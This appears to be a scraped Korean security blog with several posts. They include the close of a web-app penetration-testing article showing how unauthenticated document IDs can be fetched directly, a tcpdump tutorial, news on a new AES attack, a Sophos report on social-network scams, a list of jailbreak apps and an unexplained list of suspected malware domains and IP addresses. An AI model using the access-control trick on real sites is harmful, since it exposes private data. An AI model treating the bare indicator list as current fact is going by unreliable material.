Besides the obvious problem of clear text credentials when using Basic, there is nothing inherently wrong with HTTP authentication, and this clear-text problem be mitigated by using HTTPS. The real problem is twofold. First, since this authentication is applied by the Web server, it is not easily within the control of the Web application without interfacing with the Web server's authentication database. Therefore custom authentication mechanisms are frequently used. These open a veritable Pandora's box of issues in their own right. Second, developers often fail to correctly assess every avenue for accessing a resource and then apply authentication mechanisms accordingly.

Given this, penetration testers should attempt to ascertain both the authentication mechanism that is being used and how this mechanism is being applied to every resource within the Web application. Many Web programming environments offer session capabilities, whereby a user provides a cookie or a Session-ID HTTP header containing a psuedo-unique string identifying their authentication status. This can be vulnerable to attacks such as brute forcing, replay, or re-assembly if the string is simply a hash or concatenated string derived from known elements.

Every attempt should be made to access every resource via every entry point. This will expose problems where a root level resource such as a main menu or portal page requires authentication but the resources it in turn provides access to do not. An example of this is a Web application providing access to various documents as follows. The application requires authentication and then presents a menu of documents the user is authorised to access, each document presented as a link to a resource such as:

http://www.server.com/showdoc.asp?docid=10

Although reaching the menu requires authentication, the showdoc.asp script requires no authentication itself and blindly provides the requested document, allowing an attacker to simply insert the docid GET variable of his desire and retrieve the document. As elementary as it sounds this is a common flaw in the wild.

Conclusions

In this article we have presented the penetration tester with an overview of web applications and how web developers obtain and handle user inputs. We have also shown the importance of fingerprinting the target environment and developing an understanding of the back-end of an application. Equipped with this information, the penetration tester can proceed to targeted vulnerability tests and exploits. The next installment in this series will introduce code and content-manipulation attacks, such as PHP/ASP code injection, SQL injection, Server-Side Includes and Cross-site scripting.

'Hacking' 카테고리의 다른 글

Penetration Testing for Web Applications (Part Three)  (1) 2011.08.31
Penetration Testing for Web Applications (Part Two)  (0) 2011.08.31
tcpdump  (1) 2011.08.31
MS, AES security  (1) 2011.08.26
Malware URL  (0) 2011.08.18
Posted by CEOinIRVINE
l

tcpdump

Hacking 2011. 8. 31. 00:44

Table of contents

IntroductionBACK TO TOC

In this article I would like to talk about one of the most useful tools in my networking toolbox and that is tcpdump. Unfortunately mastering this tool completely is not an easy task. Yet stuff you do the most is relatively simple and may become a good springboard when diving into more complex topics.

tcpdump usesBACK TO TOC

tcpdump is a packet sniffer. It is able to capture traffic that passes through a machine. It operates on a packet level, meaning that it captures the actual packets that fly in and out of your computer. It can save the packets into a file. You can save whole packets or only the headers. Later you can “play” recorded file and apply different filters on the packets, telling tcpdump to ignore packets that you are not interested to see.

Under the hood, tcpdump understands protocols and host names. It will do all in its power to see what host sent each packet and will tell you its name instead of the IP address.

It is exceptionally useful tool for debugging what might have caused certain networking related problem. It is an excellent tool to learn new things.

InvocationBACK TO TOC

Invoking tcpdump is easy. First thing that you have to remember is that you should either be logged in as root or be a sudoer on the computer – sudoer is someone who is entitled to gain administrator rights on computer for short period of time using sudo command.

Running tcpdump without any arguments makes it capture packets on first network interface (excluding lo) and print short description of each packet to output. This may cause a bit of a headache in case you are using network to connect to the machine. If you are connected with SSH or telnet (rlogin?), running tcpdump will produce a line of text for each incoming or outgoing packet. This line of text will cause SSH daemon to send a packet with this line, thus causing tcpdump to produce another line of text. And this will not stop until you do something about it.

Simple filteringBACK TO TOC

So first thing that we will learn about tcpdump is how to filter out SSH and telnet packets. We will study the basics of tcpdump filtering later in this guide, but for now just remember this syntax.

# tcpdump not port 22

“not port 22″ is a filter specification that tells tcpdump to filter out packets with IP source or destination port 22. As you know port 22 is SSH port. Basically, when you tell tcpdump something like this, it will make tcpdump ignore all SSH packets – exactly what we needed.

Telnet on the other hand, uses port 23. So if you are connecting via telnet, you can filter that out with:

# tcpdump not port 23

Clear and simple!

Reading tcpdump‘s outputBACK TO TOC

By default tcpdump produces one line of text per every packet it intercepts. Each line starts with a time stamp. It tells you very precise time when packet arrived.

Next comes protocol name. Unfortunately, tcpdump understands very limited number of protocols. It won’t tell you the difference between packets belonging to HTTP and for instance FTP stream. Instead, it will mark such packets as IP packets. It does have some limited understanding of TCP. For instance it identifies TCP synchronization packets such as SYN, ACK, FIN and others. This information printed after source and destination IP addresses (if it IP packet).

Source and destination addresses follow protocol name. For IP packets, these are IP addresses. For other protocols, tcpdump does not print any identifiers unless explicitly asked to do so (see -e command line switch below).

Finally, tcpdump prints some information about the packet. For instance, it prints TCP sequence numbers, flags, ARP/ICMP commands, etc.

Here’s an example of typical tcpdump output.

17:50:03.089893 IP 69.61.72.101.www > 212.150.66.73.48777: P 1366488174:1366488582
(408) ack 2337505545 win 7240 <nop,nop,timestamp 1491222906 477679143>

This packet is part of HTTP data stream. You can see meaning of each and every field in the packet description in tcpdump’s manual page.

Here’s another example

17:50:00.718266 arp who-has 69.61.72.185 tell 69.61.72.1

This is ARP packet. It’s slightly more self explanatory than TCP packets. Again, to see exact meaning of each field in the packet description see tcpdump’s manual page.

Invocation continuedBACK TO TOC

Now, when we know how to invoke tcpdump even when connecting to the computer over some net, let’s see what command line switches are available for us.

Choosing an interfaceBACK TO TOC

We’ll start with a simple one. How to dump packets that arrived and sent through a certain network interface. -i command line argument does exactly this.

# tcpdump -i eth1

Will cause tcpdump to capture packets from network interface eth1. Or, considering our SSH/telnet experience:

# tcpdump -i eth1 not port 22

Finally, you can specify any as interface name, to tell tcpdump to listen to all interfaces.

# tcpdump -i any not port 22

Turning off name resolutionBACK TO TOC

As we debug networking issues, we may encounter a problem with how tcpdump works out of the box. The problem is that it tries to resolve every single IP address that it meets. I.e. when it sees an IP packet it asks DNS server for names of the computers behind IP address. It works flawlessly most of the time. However, there are two problems.

First, it slows down packet interception. It’s not a big deal when there are only few packets, but when there are thousands and tens of thousands it introduces a delay into the process. Amount of delay can be different, depending on the traffic.

Another, much more serious problem occurs when there is no DNS server around or when DNS server is not working properly. If this is the case, tcpdump spends few seconds trying to figure out two hostnames for each IP packet. This means virtually stopping intercepting the traffic.

Luckily there is a way around. There is an option that causes tcpdump to stop detecting hostnames and that is -n.

# tcpdump -n

And here are few variations of how you can use this option in conjunction with options that we have learned already.

# tcpdump -n -i eth1
# tcpdump -ni eth1 not port 22

Limiting number of packets to interceptBACK TO TOC

Here are few more useful options. Sometimes amount of traffic that goes in and out of your computer is very high, while all you want to see is just few packets. Often you want to see who sends you the traffic, but when you try to capture anything with tcpdump it dumps so many packets that you cannot understand anything. This is the case when -c command line switch becomes handy.

It tells tcpdump to limit number of packets it intercepts. You specify number of packets you want to see. tcpdump will capture that number of packets and exit. This is how you use it.

# tcpdump -c 10

Or with options that we’ve learned before.

# tcpdump -ni eth1 -c 10 not port 22

This will limit number of packets that tcpdump will receive to 10. Once received 10 packets, tcpdump will exit.

Saving captured dataBACK TO TOC

One of the most useful tcpdump features allows capturing incoming and outgoing packets into a file and then playing this file back. By the way, you can play this file not only with tcpdump, but also with WireShark (former Ethereal), the graphical packet analyzer.

You can do this with -w command line switch. It should be followed by the name of the file that will contain the packets. Like this:

# tcpdump -w file.cap

Or adding options that we’ve already seen

# tcpdump -ni eth1 -w file.cap not port 22

Changing packet size in the capture fileBACK TO TOC

By default, when capturing packets into a file, it will save only 68 bytes of the data from each packet. Rest of the information will be thrown away.

One of the things I do often when capturing traffic into a file, is to change the saved packet size. The thing is that disk space that is required to save the those few bytes is very cheap and available most of the time. Spending few spare megabytes of your disk space on capture isn’t too painful. On the other hand, loosing valuable portion of packets might be very critical.

So, what I usually do when capturing into a file is running tcpdump with -s command line switch. It tells tcpdump how many bytes for each packet to save. Specifying 0 as a packet’s snapshot length tells tcpdump to save whole packet. Here how it works:

# tcpdump -w file.cap -s 0

And with conjunction with options that we already saw:

# tcpdump -ni eth1 -w file.cap -s 0 -c 1000 not port 22

Obviously you can save as much data as you want. Specifying 1000 bytes will do the job for you. Just keep in mind that there are so called jumbo frames those size can be as big as 8Kb.

Reading from capture fileBACK TO TOC

Now, when we have captured some traffic into a file, we would like to play it back. -r command like switch tells tcpdump that it should read the data from a file, instead of capturing packets from interfaces. This is how it works.

# tcpdump -r file.cap

With capture file, we can easily analyze the packets and understand what’s inside. tcpdump introduces several options that will help us with this task. Lets see few of them.

Looking into packetsBACK TO TOC

There are several options that allow one to see more information about the packet. There is a problem though. tcpdump in general isn’t giving you too much information about packets. It doesn’t understand different protocols.

If you want to see packet’s content, it is better to use tools like Wireshark. It does understand protocols, analyzes them and allows you to see different fields, not only in TCP header, but in layer 7 protocols headers.

tcpdump is a command line tool and as most of the command line tools, its ability to present information is quiet limited. Yet, it still has few options that control the way packets presented.

Seeing Ethernet header for each packetBACK TO TOC

-e command line switch, causes tcpdump to present Ethernet (link level protocol) header for each printed packet. Lets see an example.

# tcpdump -e -n not port 22

Controlling time stampBACK TO TOC

There are four command line switches that control the way how tcpdump prints time stamp. First, there is -t option. It makes tcpdump not to print time stamps. Next comes -tt. It causes tcpdump to print time stamp as number of seconds since Jan. 1st 1970 and a fraction of a second. -ttt prints the delta between this line and a previous one. Finally, -tttt causes tcpdump to print time stamp in it’s regular format preceeded by date.

Controlling verbosityBACK TO TOC

-v causes tcpdump to print more information about each packet. With -vv tcpdump prints even more information. As you could guess, -vvv produces even more information. Finally -vvvv will produce an error message telling you there is no such option :D

Printing content of the packetBACK TO TOC

-x command line switch will make tcpdump to print each packet in hexadecimal format. Number of bytes that will be printed remains somewhat a mystery. As is, it will print first 82 bytes of the packet, excluding ethernet header. You can control number of bytes printed using -s command line switch.

In case you want to see ethernet header as well, use -xx. It will cause tcpdump to print extra 14 bytes for ethernet header.

Similarily -X and -XX will print contents of packet in hexadecimal and ASCII formats. The later will cause tcpdump to include ethernet header into printout.

Packet filteringBACK TO TOC

We already saw a simple filter. It causes tcpdump to ignore SSH packets, allowing us to run tcpdump from remote. Now lets try to understand the language that tcpdump uses to evaluate filter expressions.

Packet matchingBACK TO TOC

We should understand that tcpdump applies our filter on every single incoming and outgoing packet. If packet matches the filter, tcpdump aknownledges the packet and depending on command line switches either saves it to file or dumps it to the screen. Otherwise, tcpdump will ignore the packet and account it only when telling how many packets received, dropped and filtered out when it exits.

To demostrate this, lets go back to not port 22 expression. tcpdump ignores packets that either sourced or destined to port 22. When such packet arrives, tcpdump applies filter on it and since the result is false, it will drop the packet.

More qualifiersBACK TO TOC

So, from what we’ve seen so far, we can conclude that tcpdump understands a word port and understands expression negation with not. Actually, negating an expression is part of complex expressions syntax and we will talk about complex expressions a little later. In the meantime, lets see few more packet qualifiers that we can use in tcpdump expressions.

We’ve seen that port qualifier specifies either source or destination port number. In case we want to specify only the source port or only the destination port we can use src port or dst port. For instance, using following expression we can see all outgoing HTTP packets.

# tcpdump -n dst port 80

We can also specify ranges of ports. portrange, src portrange and dst portrange qualifiers do exactly this. For instance, lets see a command that captures all telnet and SSH packets.

# tcpdump -n portrange 22-23

Specifying addressesBACK TO TOC

Using dst host, src host and host qualifiers you can specify source, destination or any of them IP addresses. For example

# tcpdump src host alexandersandler.net

Will print all packets originating from alexandersandler.net computer.

You can also specify Ethernet addresses. You do that with ether src, ether dst and ether host qualifiers. Each should be followed by MAC address of either source, destination or source or destination machines.

You can specify networks as well. The net, src net and dst net qualifiers do exactly this. Their syntax however slighly more complex than those of a single host. This is due to a netmask that has to be specified.

You can use two basic forms of network specifications. One using netmask and the other so called CIDR notation. Here are few examples.

# tcpdump src net 67.207.148.0 mask 255.255.255.0

Or same command using CIDR notation.

# tcpdump src net 67.207.148.0/24

Note the word mask that does the job of specifying the network in first example. Second example is much shorter.

Other qualifiersBACK TO TOC

There are several useful qualifiers that don’t fall under any of the categories I already covered.

For instance, you can specify that you are interested in packets with specific length. length qualifier does this. less and greater qualifiers tell tcpdump that you are interested in packets whose length is less or greater than value you specified.

Here’s an example that demonstrates these qualifiers in use.

# tcpdump -ni eth1 greater 1000

Will capture only packets whose size is greater than 1000 bytes.

Complex filter expressionsBACK TO TOC

As we already saw we can build more complex filter expressions using tcpdump filters language. Actually, tcpdump allows exceptionally complex filtering expressions.

We’ve seen not port 22 expression. Applying this expression on certain packet will produce logical true for packets that are not sourced or destined to port 22. Or in two words, not negates the expression.

In addition to expression negation, we can build more complex expressions combining two smaller expression into one large using and and or keywords. In addition, you can use brackets to group several expressions together.

For example, lets see a tcpdump filter that causes tcpdump to capture packets larger then 100 bytes originating from google.com or from microsoft.com.

# tcpdump -XX greater 100 and \(src host google.com or src host microsoft.com\)

and and or keywords in tcpdump filter language have same precedence and evaluated left to right. This means that without brackets, tcpdump could have captured packets from microsoft.com disregarding packet size. With brackets, tcpdump first makes sure that all packets are greater than 100 bytes and only then checks their origin.

Note the backslash symbol (“\”) before brackets. We have to place them before brackets because of shell. Unix shell has special understanding of what brackets used for. Hence we have to tell shell to leave these particular brackets alone and pass them as they are to tcpdump. Backslash characters do exactly this.

Talking about precedence, we have to keep in mind that in tcpdump’s filter expression language not has higher precedence than and and or. tcpdump’s manual page has very nice example and emphasizes the meaning of this.

not host vs and host ace

and

not (host vs or host ace)

are two different expressions. Because not has higher precedence over and and or, filter from the first example will capture packets not to/from vs, but to/from ace. Second filter example on the other hand will capture packets that are not to/from vs and to/from ace. I.e. first will capture packet from ace to some other host (but not to vs). Yet second example won’t capture this packet.

Repeating qualifiersBACK TO TOC

To conclude this article, I would like to tell you one more thing that may become handy when writing complex tcpdump filter expressions.

Take a look at the following example.

# tcpdump -XX greater 100 and \(src host google.com or microsoft.com\)

We already saw this example, with one little exception. In previous example we had a src host qualifier before microsoft.com and now its gone. The thing is that if we want to use same qualifier two times in a row, we don’t have to specify it twice. Instead we can just write qualifier’s parameter and tcpdump will know what to do.

This makes tcpdump filter expression language much easier to understand and much more readable.

AfterwordBACK TO TOC

I hope you found this article useful. In case you have questions, suggestions or you would like to share your appreciation to the author ;-) , don’t hesitate to mail me to alexander.sandler@gmail.com

Related posts:

'Hacking' 카테고리의 다른 글

Penetration Testing for Web Applications (Part Two)  (0) 2011.08.31
Penetration Testing for Web Applications (Part One)  (0) 2011.08.31
MS, AES security  (1) 2011.08.26
Malware URL  (0) 2011.08.18
Social Networking Security Threats  (0) 2011.08.12
Posted by CEOinIRVINE
l

MS, AES security

Hacking 2011. 8. 26. 11:23
MS, AES 암호 규격의 방어벽에 처음으로 균열 생긴 것
미국 마이크로소프트와 벨기에 있는 루벤·카톨릭대학의 연구자들이 널리 사용되고 있는 AES암호 알고리즘을 공격하는 방법을 발견했다고 외신이 보도했다.
 
루벤·카톨릭대학의 보고(Biclique Cryptanalysis of the Full AES )에 의하면 그들이 고안한 공격 수법은 종래 고려되어 왔던 속도의 3배에서 5배 속도로 AES 비밀 키를 복구(recovery)하는 것이 가능하다.
 
연구자들은 이 공격은 본질적으로 복잡한 것으로 기존 기술을 이용해서 간단하게 공격되지는 않는다고 주의를 촉구하고 있다. 실제로 연구자들이 채용한 수법에 의하면 AES 암호 알고리즘을 해독하는 데에는 수 십억 년에 해당하는 컴퓨터 처리 시간이 필요한 것 같다.
 
그러나 오랜 기간에 걸친 그들의 암호 해독 프로젝트가 내 놓은 성과는 지금까지 해독 불능이었던 AES 암호 규격의 방어벽에 처음으로 구멍이 열린 것이라고 말해도 좋을 것이다.
 
금융거래의 안전화라는 극히 중요한 처리에 적용되는 암호 규격을 평가하는 경우, 시큐리티 전문가는 암호화 알고리즘이 극히 악의적인 공격에도 견디어내는 능력을 갖고 있는 지를 판단한다.
 
지금 이 순간은 안전한 암호화 방법이라고 생각되는 기술일지라도 가까운 미래에 등장하게 될 고속 컴퓨터나 수치 연산의 새로운 기술이 출현하는 경우에는, 쉽게 그 벽이 무너질지도 모르기 때문이다.
 
이번 조사에 의해서 “AES 안전성의 한계도 지속적으로 떨어지고 있다는 사실을 알게 되었다”고 시큐리티 전문가인 Bruce Schneier는 자신의 블로그에 남겼다.
 
또한 Schneier는 “공격 수법은 항상 진화하고 있다. 이것은 결코 퇴화하는 일은 없다”라는 미국 NSA의 전문가의 말도 블로그에 인용하고 있다.
(www.schneier.com/blog/archives/2011/08/new_attack_on_a_1.html)
 
실행하기에는 대단한 노력이 필요하지만 연구자들이 확립한 공격 방법은 다양한 버전의 AES에 대해서도 유효하다.
 
Microsoft Research의 Dmitry Khovratovich, 루벤·카톨릭대학의 연구자인 Andrey Bogdanov, 파리에 있는 Ecole Normale Superieure (ENS)의 Christian Rechberger 등 3명이 이번 프로젝트를 완수했다.
 
Bogdanov와 Rechberger는 Microsoft Research와 공동으로 프로젝트에 전념하기 위하여 대학을 휴학한 것 같다. 루벤·카톨릭대학에 의하면, AES를 제안하였던 Joan Daemen과 Vincent Rijmen도 이들 공격의 유효성을 인식하고 있다고 말했다.
[정보제공. 박춘식 서울여자대학교 교수]

[저작권자 ⓒ데일리시큐 무단 전재-재배포 금지]


'Hacking' 카테고리의 다른 글

Penetration Testing for Web Applications (Part One)  (0) 2011.08.31
tcpdump  (1) 2011.08.31
Malware URL  (0) 2011.08.18
Social Networking Security Threats  (0) 2011.08.12
Jailbreak Apps  (2) 2011.08.09
Posted by CEOinIRVINE
l

Malware URL

Hacking 2011. 8. 18. 02:23
a[0-99].googletrait.com    
ns[0-99].info    
dns[0-99].us    
dns[0-99].dyndns.info    
dns[0-99].dyndns.org    
221.218.161.0    
210.223.204.0    
183.92.47.0    
123.118.142.0    
61.96.202.0    
49.247.255.0    
back.windowsxps.co.kr    
update.microsoftshell.com    
mail.winxps.com    
116.127.121.41    
cache.soucesp.com    
ywliyi.com    
yxrkhjs.gov.cn    
yuhuabei.com.cn    
yutong168.com    
ywjnt.com    
ytzr.com    
xiaomiao.net    
www.xinnet00.com    
www.neoluxel.com    
www.niubiyizu.com    
www.wintergemfarm.com    
www.hkslag.co.kr    
www.aiosk.com    
www.diarix.net    
igameer.appspot.com    
secureplace.biz    
usb.2580.com    
w29.com    
robingood.beeglover.cn    
news.an85.kr    
core2948.mylivejournalchanel.com    
miteksns.co.rs    
www.sofec.21s.fr    
www.i42.de    
www.jnxsezzb.com    
www.popgrle.com    
checkdizz.com    
piclooks.com    
nabe-ma.bakblu.com    
iufdvm.com    
jaji79.com    
kakolog.desktop2ch.net.playwow.us    
intranet.tomonline-inc.com    
intranet.tomonline-inc.com    
dana79.com    
game.playwow.us    
echinababy.com    
cfgty.com    
cutyline.zuzunza.joins.com    
chinanasdaq.com    
aop1.homelinux.com    
b0t.meibu.com    
bot.timewalk.me    
ado77.com    
01023111478.kt.io    
merlinmotorsport.co.uk    
66xiu.com    
ro.diggfunny.com    
cache.mindplat.com    
124.236.50.9    110730
cache.soucesp.com    
123.147.244.3    110730
50.16.254.123    110730
216.108.235.94    110730
116.127.121.109    110729
121.78.237.135    110729
119.253.42.182    110729
lvlove.info    
dyndns-at-work.com    
dyndns-ip.com    
dyndns-pics.com    
dyndns-at-home.com    
dyndns-server.com    
dyndns-web.com    
dyndns.org    
dyndns-wiki.com    
dyndns-work.com    
dyndns.info    
dyndns-mail.com    
dyndns-remote.com    
dyndns.tv    
dyndns-office.com    
dyndns-home.com    
dyndns-blog.com    
dyndns.biz    
dyndns-free.com    
27.255.64.0    
222.1.41.0    
216.18.211.0    
nexononline.com    
nexongame.net    
reegame.net    
google-analytics.dyndns-mail.com    
hpsupport.dns1.us    
dns01.dyndns.info    
dell.dyndns-office.com    
down2.winsoft9.com    
jesr.info    
koreasys1.com    
kowec.com    
wstatic.dcinside.com    
jrkxkf.com    
centralserver.qicp.net    
ns.dns3-domain.com    
mail.nexongame.net    
a1.reegame.net    
94.100.23.27    
183.92.47.211    
123.118.142.187    
49.247.255.43    
googletrait.com    
mail.hp-supports.org    
file.hp-supports.com    
file.googlefiles.net    
hack520.co.kr    
support.nexononline.com    
222.1.41.47    
down.tzh.kr    
Mremote    
210.223.204.67    
221.218.161.209    
caihong.kr    
an85.kr    
0day.kr    
vul.kr    
MyApp1.0    
ibmsupport.dyndns.org    
ibmsupport.dyndns.org    
dellsupport.dyndns-server.com    
dell.dyndns-wiki.com    
dns00.dyndns.org    
www.dnf782.com    
www.lwb80038.com    
www.feel6663.com    
www.ulmani.com    
70.39.99.123    
174.128.224.37    
hmmdt.com    
xmd.aspscript.info    
dw.mxdblog.info    
sleep.dnfgame.info    
fdsadhw11.info    
www.torysl.com    
dw.irisfilm.info    
ad.cy.co.kr    
174.128.224.47    
70.39.99.115    
70.39.99.111    
ylkf.coochou.com    
72.18.195.183    
lrvou.info    
vgob.info    
96.44.173.210    
96.44.173.126    
96.44.173.125    
caryhands.com    
files.caryhands.com    
61.78.63.171    
218.38.54.179    
74.82.179.57:82    
q8q.in    
up.mhhsrn.com    
images.stmaiget.com    
3162 http iis isapi .ida    
img.uyrubr.com    
ad.ilikec1ick.com    
tgong.co.kr    
www.9191game.com    
www.indisk.co.kr    
www.alahb.com    
hao.yueren.info    
ad.imad.co.kr    
www.allbook.biz    
www.mount-tai.com.cn    
muryoj.com    
2chsearch.info    
down.skypesotf.com    
www.yxwy.net.CN    
wbm.whu.edu.cn    
bidstrafen.com    
boaoyy.com    
ddsjy.com    
xuefu1.com    
yxhh.net    
gpbctv.com    
pacenoge.org    
gregshin.pe.kr    
junggomania.nefficient.co.kr    
www.sina.com.cn    
travlman.com    
7766.org    
99-22.cn    
2288.org    
9966.org    
8800.org    
6600.org    
8866.org    
3322.org    
bta.net.cn    
yxhh.net    
mz.cn    
www.531140.com    
images.kidkids.net    

'Hacking' 카테고리의 다른 글

tcpdump  (1) 2011.08.31
MS, AES security  (1) 2011.08.26
Social Networking Security Threats  (0) 2011.08.12
Jailbreak Apps  (2) 2011.08.09
Wardriving Evolves Into Warflying  (0) 2011.08.05
Posted by CEOinIRVINE
l

Facebook: Self-XSS, clickjacking and survey scams abound

With so many users, Facebook is a target for scams; it can also expose your personal information far beyond your group of friends.

Users need to remember that Facebook makes money from its advertisers, not users. Since advertisers want to get their message out to as many people as possible, Facebook shares your information to everyone, not just your "friends." And most recently, Facebook's facial recognition technology automatically suggests that friends tag you, unless you turn it off.

Scams on Facebook include cross-site scripting, clickjacking, survey scams and identity theft. One of the scammers' favorite methods of attack of the moment is known as cross-site scripting or "Self-XSS." Facebook messages such as Why are you tagged in this video? and the Facebook Dislike button take you to a webpage that tries to trick you into cutting and pasting a malicious JavaScript code into your browser’s address bar. Self-XSS attacks can also run hidden, or obfuscated, JavaScript on your computer allowing for malware installation without your knowledge.

Facebook scams also tap into interest in the news, holiday activities and other topical events to get you to innocently reveal your personal information. Facebook posts such as “create a Royal Wedding guest name” and "In honor of Mother’s Day" seem innocuous enough, until you realize that information such as your children’s names and birthdates, pet’s name and street name now reside permanently on the Internet. Since this information is often used for passwords or password challenge questions, it can lead to identity theft.

Other attacks on Facebook users include "clickjacking" or "likejacking," also known as "UI redressing." This malicious technique tricks web users into revealing confidential information or takes control of their computer when they click on seemingly innocuous webpages. Clickjacking takes the form of embedded code or script that can execute without the user's knowledge. One disguise is a button that appears to perform another function. Clicking the button sends out the attack to your contacts through status updates, which propagates the scam. Scammers try to pique your curiosity with messages like "Baby Born Amazing effects" and "The World Funniest Condom Commercial – LOL". Both clickjacking scams take users to a webpage urging them to watch a video. By viewing the video, it’s posted that you “like” the link and it’s shared with your friends, spreading it virally across Facebook.

Clickjacking is also often tied to “survey scams” which trick users into installing an application from a spammed link. Cybercriminals take advantage of news topics, such as the Osama bin Laden video scam, which takes you to a fake YouTube site in an effort to get you to complete a survey. Scammers earn commission for each person that completes it. Taking the survey also spreads the scam virally to your Facebook friends.

In theory, new Facebook security features provide protection against scams and spam—but unfortunately they’re mainly ineffectual. Self-XSS, clickjacking and survey scams essentially did not exist just a few years ago, but they now appear on Facebook and other social networks on a daily basis.

Our recent social networking poll also asked computer users which social network they felt posed the biggest security risk. Facebook is clearly seen as the biggest risk with 81% of the votes, a significant rise from the 60% who felt Facebook was the riskiest when we first asked the question a year ago. Twitter and MySpace each received 8% of the votes this year, and LinkedIn only 3%.

Twitter: Beware of shortened URLs

Twitter is a valuable source of real-time information. During the devastating Japanese earthquake and tsunami in March, Twitter users shared information and helped raise funds. Unfortunately, as often happens, scammers try to channel that goodwill for their own gain. A Twitter scam impersonating the British Red Cross asked tweeters to send money via MoneyBookers to a Yahoo email address in one Japanese tsunami charity scam. In another scam, emails resembling Twitter notifications included dangerous links disguised as a tsunami video. If you clicked on this link, malicious JavaScript could infect your computer.

Twitter users often shorten URLs via bit.ly and other services to keep tweets within their 140 character limit. Hackers can also create shortened URLs to easily redirect you to malicious sites, since the URL itself gives you no indication of the site name. Although most shortened URLs are legitimate, if a link brings you to another page that asks for a Twitter or Facebook password, leave immediately.

Similar to Facebook scams, Twitter messages promise such curiosities as the “Banned Lady Gaga Video,” which takes users to a fake YouTube page. If you click the play button, a window pops up and seeks permission to access your Twitter account. If you grant access, you allow third parties to post messages in your name. Another recent scam, “TimeSpentHere,” promises to tell you how many hours you’ve spent on Twitter. Since it appears to come from a Twitter friend, you may think about clicking on it. But this rogue application actually wants your email address, which could be used later for a phishing campaign or spam.

LinkedIn: Threats remain low

Although cybercriminals more frequently target users of Facebook and Twitter, the business networking site LinkedIn is also a target.

The biggest threat with LinkedIn is data-mining. Cybercriminals take information about companies and whom they employ, and then use that information to launch spearphishing attacks. Corporate directories also exist online, providing a wealth of information for spearphishers.

Malicious LinkedIn invitation reminders pose another threat. These links can redirect you to a webpage that installs a variant of the Zbot malware (also known as Zeus) onto your computer. If you click, remote hackers can now compromise your computer and potentially steal your confidential data.

Google Plus: Early users demand privacy

Google Plus, a recently launched social network that aims to compete head-to-head with Facebook, is learning the ropes as far as privacy is concerned. Google currently restricts the social network to a "limited field trial" so they can gather feedback, patch bugs and identify privacy holes before making the site available to a mass audience. Privacy experts say that Google Plus is designed to let people have better control over privacy with respect to sharing with family, co-workers and friends.

In response to initial user feedback, Google Plus recently changed its privacy options around gender, so that users do not have to reveal their gender online.

Protection strategies for social networking

Facebook has its own Facebook Security page. But we also recommend reviewing the Sophos best practice guidelines for Facebook privacy settings with your organization’s staff and setting up ongoing security training and awareness. You can also keep up to date with the real threats on Facebook by encouraging all users to join the Sophos Facebook page. Our Facebook page alerts you to the latest rogue applications, scams and malware attacks threatening social network users. You can also learn how to clean up your Facebook profile after a survey scam in this Sophos YouTube video.

Facebook security best practices: A summary

  • Adjust Facebook Privacy settings
  • Read the Facebook Guide to Privacy
  • Think carefully about choosing your friends
  • Show “limited friends” a cut-down version of your profile
  • Disable options, then open them one by one

If you’re a victim of rogue Twitter applications, you can remove their rights by going to the Twitter website and visiting Settings/Applications and revoking the offending app’s rights. Twitter also has a Safety Center within its Help center and blog posts on how to Avoid Phishing Scams. You can get regular status updates on Twitter by following @safety and @spam. And, be sure to follow @SophosLabs to get regular updates to protect your business.

LinkedIn’s blog discusses security issues and includes posts such as Protecting yourself from hackers and Quick tips on Security and Privacy.

Consider working with your communications team to put a Social Media Policy in place for your company that includes not only how to communicate using social media, but also how to protect yourself on these sites. Also realize that some sites let you broadcast your messages between different social networks. For instance, you can choose to have all of your LinkedIn updates also sent out as tweets, but remember that your audience on Twitter can be anyone, whereas only your own network can view LinkedIn updates.

Finally keep your antivirus software up to date, install the latest security patches and if you’re looking for news, go to the legitimate news websites, rather than clicking on a link that sent by a friend.

For more information or to read the Sophos Security Threat Report Mid-Year 2011 in its entirety, download now.


'Hacking' 카테고리의 다른 글

MS, AES security  (1) 2011.08.26
Malware URL  (0) 2011.08.18
Jailbreak Apps  (2) 2011.08.09
Wardriving Evolves Into Warflying  (0) 2011.08.05
IM Server  (1) 2011.08.03
Posted by CEOinIRVINE
l

Jailbreak Apps

Hacking 2011. 8. 9. 09:43

February 10, 2011 - By æ

You may have seen yesterday’s GSL post listing twenty, must-have apps for new Verizon iPhone users. The list included apps that were approved by Apple and, as a result, available in the traditionally-used App Store. As most iPhone users know, there is another side to the app world. Known to the world as Cydia, it is much like an alternate dimension that contains its own treasure trove of apps that Apple would never consider approving due to the fact that they use the jailbroken infrastructure to bypass restrictions on functionality and use that Apple has deemed necessary.

We’re not discussing the how-to or ethics of jailbreaking with Greenpois0n or any other tool. We’re not debating the potential impact of invalidating your warranty with Apple. We’re also not going to discuss things like Hackulous or how to jailbreak your device. These are all things you can research on your own, in order to make the decision that best suits you. The list of apps is provided with the assumption that you’ve already jailbroken your new Verizon (or AT&T) iPhone and want to know which apps have the greatest potential to make your iPhone life better.

We’re keeping it simple by listing the app’s name and a brief description of what the authors states is its function. They may have a price associated with them. You’ll be informed if they do, prior to installing them. Additionally, please be sure to read the advisories and disclaimers at the bottom of the post before installing anything:

  • MyOs – Allows enabling/disabling of features (e.g. multitasking,Unified iPod, etc.) without editing .plist files
  • FastSnap – Allows the hardware volume button to be used as camera/video controls
  • qTweeter - Update and read Facebook and Twitter status. Activates with a swipe of the status bar.
  • Folder Enhancer – Provides more granular control over folders, the number of allowable icons, creation of subfolders, and hiding of folders.
  • Grid Tab for Safari – Allows open tabs within Safari to be displayed in a grid pattern, versus requiring left/right scrolling to view them.
  • AppSync for iOS 4.1/4.2 – Allows for manual installation of .ipa files. (Read: Install apps without using iTunes.)
  • biteSMS – Enhanced SMS messaging app that includes privacy, emoticon, signatures, delivery reports and more.
  • CyDelete - Allows for the deletion of Cydia-installed apps via the normal iPhone app hold & tap deletion method, instead of opening Cydia to delete it.
  • Five Icon Dock – Let’s you place five icons in the iPhone dock, versus the default four.
  • Five -Column Springboard – Arranges apps in five icons on your iPhone, versus the default four.
  • Gridlock – Allows you to place your icons anywhere and in the pattern of your choice, instead of four to a row.
  • Home Page in Safari – Easily reset your homepage within Safari for iPhone by tapping the “+” icon.
  • iFile for iOs4 – Access, manage and edit the file system on your iPhone to control features like multitasking, wallpapers, battery percentage, etc.
  • Infinifolders – Allows you to add more than the default twelve apps within a folder and navigate within folders via vertical scroll.
  • Fake Operator – Adds a sub-menu within Settings, which can be accessed to change the carrier from the default to a customized one.
  • MobileTerminal 426 – Terminal emulator for the iPhone providing traditional system administration functions. (Read: Experts only)
